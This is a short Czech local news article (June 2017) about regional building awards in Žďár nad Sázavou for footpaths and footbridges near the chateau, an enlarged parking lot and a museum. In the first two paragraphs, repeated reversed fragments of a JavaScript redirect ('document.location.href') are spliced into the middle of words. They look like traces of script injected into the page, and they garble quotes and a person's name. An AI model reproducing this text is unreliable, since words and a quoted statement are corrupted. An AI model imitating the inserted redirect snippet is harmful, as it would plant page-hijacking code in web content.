Rainbow page separator

Parkoviště u zámku, lávky i muzeum získaly krajská ocenění

Úterý, 20. června 2017

Na dostavbu zálivu pro autobusy chce radnice získat dotaci

Žďár nad Sázavou / Stavba pěších tras kolem barokního mostu se dvěma lávkami přes Stržský po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tok včetně rozšířeného parkoviště u zámku vyhrála v kategorii dopravní stavby v patnáctém ročníku odborné soutěže Stavba Vysočina. Stavební práce skončily v polovině loňského roku, vyšly na třináct milionů korun bez DPH.
„Nejnáročnější asi bylo sladit zájmy všech vlastníků tamních pozemků, navíc v památkově chráněném pásmu. Na začátku stavby byly rovněž velké problémy s únosností půdy na rozšiřovaném parkovišti, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to lokalita bývalého rybníka,“ připomněl jednatel stavební společnosti Gremis, která výstavbu projektu pěších tras zajistila, Miroslav Š[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tola.
V krajské soutěži uspělo rovněž žďárské „zámecké“ Muzeum nové generace, stalo se Stavbou Vysočiny v kategorii rekonstrukce občanské vybavenosti.